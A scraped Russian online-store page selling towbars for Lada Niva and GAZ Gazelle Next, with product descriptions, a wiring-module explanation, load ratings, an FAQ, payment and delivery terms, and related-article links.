Все ТСУ сертифицированы, покрашены порошковой краской.

Бампер для крепления снимать не нужно, при необходимости требуется подрезка нижней юбки. Установка идет в штатные места крепления усилителя. При необходимости нужно будет их рассверлить для усиления конструкции втулками.

Владельцы Lada предпочитают прицепные устройства от Лидер Плюс. Также, популярен производитель Автос.

Обратите внимание, что при подключении электрики потребуется блок согласования Smart Connect. Он подключается к проводке машины и оптимизирует работу электрической системы. Исключает перегрев проводов идущих к штатной оптике автомобиля.

В отличии от обычного электрокомплекта, при подключении Smart Connect с проводов задних фонарей снимается только сигнал, а сам модуль и прицеп питаются от аккумулятора через силовой кабель. При коротком замыкании, погружении в воду светотехники прицепного оборудования, заменить надо будет только предохранитель, находящийся в легкодоступном месте.

Если вас интересует оригинальное оборудование, рекомендованное заводом изготовителем Lada, то обратите внимание на штатную проводку. Она устанавливается в штатные разъемы, в большинстве случаев не требует резки/пайки, и при необходимости активируется через диагностический разъем.

У каждого прицепного есть два важных параметра переносимых нагрузок:

  • Тяговая, или горизонтальная нагрузка. Имеет значение для грузов, перевозимых за автомобилем, например: прицеп, лодка. Если будете возить что-то тяжелое — подберите ТСУ помощнее.
  • Вертикальная. Определяет, какой вес допустим при давлении на шар сверху. Критично, если будете перевозить велосипед, мотоцикл и прочие грузы, которые крепятся вертикально.

Прицепные устройства на Lada Нива выдерживают тяговую нагрузку 600-1900кг и вертикальную 50-80кг. Учтите это при подборе, исходя из того, что придется транспортировать. Сомневаетесь — проконсультируйтесь у наших специалистов.

Частые вопросы:

Да, конечно. Наши установочные центры расположены по всей Москве.

  • Является ли установка фаркопа переоборудованием автомобиля?

Нет, это не создаст вам дополнительных проблем, так как вся продукция сертифицирована.

  • Снимут ли меня с заводской гарантии на автомобиль если я установлю фаркоп не у оф дилера, а у вас.

Нет, наши тех. центры имеют все необходимые сертификаты на установку доп. оборудования.

  • Нужна ли регистрация в ГИБДД?

Нет, не нужна, так как вы устанавливаете сертифицированный фаркоп в места предусмотренные заводом изготовителем автомобиля.

  • Какая гарантия на ваш товар?

На все изделия предоставляется заводская гарантия от производителя от 12 месяцев. Не распространяется на лакокрасочное покрытие.

  • Отправляете по России и странам СНГ?

Да, отправляем. Детали уточните на сайте или у менеджеров.

По Москве — от четырех часов до двух дней. По России и странам СНГ зависит от вашего города. Всегда готовы проконсультировать по точным срокам.

Если требуется совет специалиста или нужно связаться с нами по любой другой причине, это можно сделать одним из удобных способов:

§

Шар фаркопа не всегда должен быть установлен на автомобиле, его можно снимать при необходимости.

Почти на всех моделях фаркопа шар можно демонтировать, когда он не используется по назначению. Для вашего авто подойдет фланцевый – крепится на 2-х или 4-х болтах, в большинстве случаев к видимой балке фаркопа.

Все ТСУ сертифицированы, покрашены порошковой краской.

Бампер для крепления снимать не нужно, при необходимости требуется подрезка нижней юбки. Установка идет в штатные места крепления усилителя. При необходимости нужно будет их рассверлить для усиления конструкции втулками.

Владельцы ГАЗ предпочитают прицепные устройства от Лидер Плюс. Также, популярны производители Автос и Трейлер.

Обратите внимание, что при подключении электрики потребуется блок согласования Smart Connect. Он подключается к проводке машины и оптимизирует работу электрической системы. Исключает перегрев проводов идущих к штатной оптике автомобиля.

В отличии от обычного электрокомплекта, при подключении Smart Connect с проводов задних фонарей снимается только сигнал, а сам модуль и прицеп питаются от аккумулятора через силовой кабель. При коротком замыкании, погружении в воду светотехники прицепного оборудования, заменить надо будет только предохранитель, находящийся в легкодоступном месте.

Если вас интересует оригинальное оборудование, рекомендованное заводом изготовителем ГАЗ, то обратите внимание на штатную проводку. Она устанавливается в штатные разъемы, в большинстве случаев не требует резки/пайки, и при необходимости активируется через диагностический разъем.

У каждого прицепного есть два важных параметра переносимых нагрузок:

  • Тяговая, или горизонтальная нагрузка. Имеет значение для грузов, перевозимых за автомобилем, например: прицеп, лодка. Если будете возить что-то тяжелое — подберите ТСУ помощнее.
  • Вертикальная. Определяет, какой вес допустим при давлении на шар сверху. Критично, если будете перевозить велосипед, мотоцикл и прочие грузы, которые крепятся вертикально.

Прицепные устройства на ГАЗ Газель Next выдерживают тяговую нагрузку 900-2000кг и вертикальную 50-100кг. Учтите это при подборе, исходя из того, что придется транспортировать. Сомневаетесь — проконсультируйтесь у наших специалистов.

Частые вопросы:

Да, конечно. Наши установочные центры расположены по всей Москве.

  • Является ли установка фаркопа переоборудованием автомобиля?

Нет, это не создаст вам дополнительных проблем, так как вся продукция сертифицирована.

  • Снимут ли меня с заводской гарантии на автомобиль если я установлю фаркоп не у оф дилера, а у вас.

Нет, наши тех. центры имеют все необходимые сертификаты на установку доп. оборудования.

  • Нужна ли регистрация в ГИБДД?

Нет, не нужна, так как вы устанавливаете сертифицированный фаркоп в места предусмотренные заводом изготовителем автомобиля.

  • Какая гарантия на ваш товар?

На все изделия предоставляется заводская гарантия от производителя от 12 месяцев. Не распространяется на лакокрасочное покрытие.

  • Отправляете по России и странам СНГ?

Да, отправляем. Детали уточните на сайте или у менеджеров.

По Москве — от четырех часов до двух дней. По России и странам СНГ зависит от вашего города. Всегда готовы проконсультировать по точным срокам.

Если требуется совет специалиста или нужно связаться с нами по любой другой причине, это можно сделать одним из удобных способов:

§

В интернет-магазине newnewniva.ru покупку можно оплатить:

  • наличными (при курьерской доставке по Москве и МО, при самовывозе)
  • оплата по карте Visa, Maestro, MasterCard, Мир (при доставке по России)
  • оплата по счету на банковские реквизиты, длю юр. и физ. лиц
  • Яндекс.Деньги (при доставке по России)
  • Qiwi  (при доставке по России)

Обращаем Ваше внимание на то, что доставка заказанного товара осуществляется собственной курьерской службой, поэтому курьеры всегда на связи и доставляют заказы вовремя. В среднем доставка заказа до клиента по Москве составляет от 4 часов до 2 дней.

Доставка по г.Москва

Важно: в случае отказа от товара при отсутствии брака, Вы оплачиваете курьеру стоимость доставки.

Доставка по Московской Области:

  • 400 рублей 30 рублей/км (от МКАД), до подъезда
  • 30 рублей/км (от МКАД), до подъезда, при сумме заказа от 8000 рублей;

Важно: в случае отказа от товара при отсутствии брака, Вы оплачиваете курьеру стоимость доставки.

Доставка по России

  • Доставка осуществляется транспортной компанией на выбор клиента, клиент оплачивает доставку до Транспортной компании и услуги Транпортной компании. Товар отгружается только после 100% предоплаты и поступления денег на наш расчетный счет. 
  • Стоимость доставки до транспорной компании — 400 рублей, при сумме больше 8000 рублей — БЕСПЛАТНО.

Доставка в Казахстан и Белоруссию

  • Доставка осуществляется Транспортной Компанией КИТ, клиент оплачивает доставку до Транспортной компании и услуги Транпортной компании. Товар отгружается только после 100% предоплаты и поступления денег на наш расчетный счет. 
  • Стоимость доставки до транспорной компании — 400 рублей, при сумме больше 8000 рублей — БЕСПЛАТНО.

Читать новости о новой ниве

  • Ходовая часть, передняя подвеска, устройство, Конструкция, эксплуатация, описание, устройство, ремонт автомобилей Нива ВАЗ 2121, двигатель, сборка, разборка, трансмиссии, коробки передачХодовая часть, передняя подвеска, устройство, Конструкция, эксплуатация, описание, устройство, ремонт автомобилей Нива ВАЗ 2121, двигатель, сборка, разборка, трансмиссии, коробки передач
  • LADA Niva Legend 5 дв. – Технические характеристики – 
Официальный сайт LADALADA Niva Legend 5 дв. – Технические характеристики –
    Официальный сайт LADA
  • Как включается полный привод на рено дастерКак включается полный привод на рено дастер
  • Раздатка Нива — Устройство — Лада мастерРаздатка Нива — Устройство — Лада мастер
  • Тюнинг Нивы для бездорожья от профессионала «Тюнинг Нивы для бездорожья от профессионала «
  • Мини-джип «Урал-Моторс»: внедорожник без прикрас — Блог Артема КрасноваМини-джип «Урал-Моторс»: внедорожник без прикрас — Блог Артема Краснова
  • Установка Хабов На НивуУстановка Хабов На Ниву
  • Нерегулируемые ступичные подшипники на нивуНерегулируемые ступичные подшипники на ниву

Читать новости о новой ниве

  • Самый дешевый джип. Смотрим на новую Niva Travel в стиле RAV4 — чем хороша и сколько стоит. Тест-драйв новой Lada Niva Travel 2021— что изменилось в машине?Самый дешевый джип. Смотрим на новую Niva Travel в стиле RAV4 — чем хороша и сколько стоит. Тест-драйв новой Lada Niva Travel 2021— что изменилось в машине?
  • Размеры дисков Chevrolet Niva — Таблицы размеровРазмеры дисков Chevrolet Niva — Таблицы размеров
  • Установка фаркопа на ниву шевролеУстановка фаркопа на ниву шевроле
  • Расход бензина Нива Шевроле на 100 кмРасход бензина Нива Шевроле на 100 км
  • Самый маленький кроссовер Toyota: технические характеристики и дата премьеры — Российская газетаСамый маленький кроссовер Toyota: технические характеристики и дата премьеры — Российская газета
  • Подвеска Нива Шевроле: передняя, задняя, устройство и тюнингПодвеска Нива Шевроле: передняя, задняя, устройство и тюнинг
  • Нива Рысь 1 Бронто. Мос БРОНТО: Москва, Санкт-Петербург, Нижний Новгород, Ростов, Тула, Ярославль, Минск, Могилев, Гродно.Нива Рысь 1 Бронто. Мос БРОНТО: Москва, Санкт-Петербург, Нижний Новгород, Ростов, Тула, Ярославль, Минск, Могилев, Гродно.
  • Смесеобразование в бензиновых двигателяхСмесеобразование в бензиновых двигателях
1 ЗвездаНельзя так писать о НивеНа троечкуНива хороша!Нива лучше всех! (1 оценок, среднее: 4,00 из 5)
Загрузка...
Закладка Постоянная ссылка.

Добавить комментарий

Ваш адрес email не будет опубликован.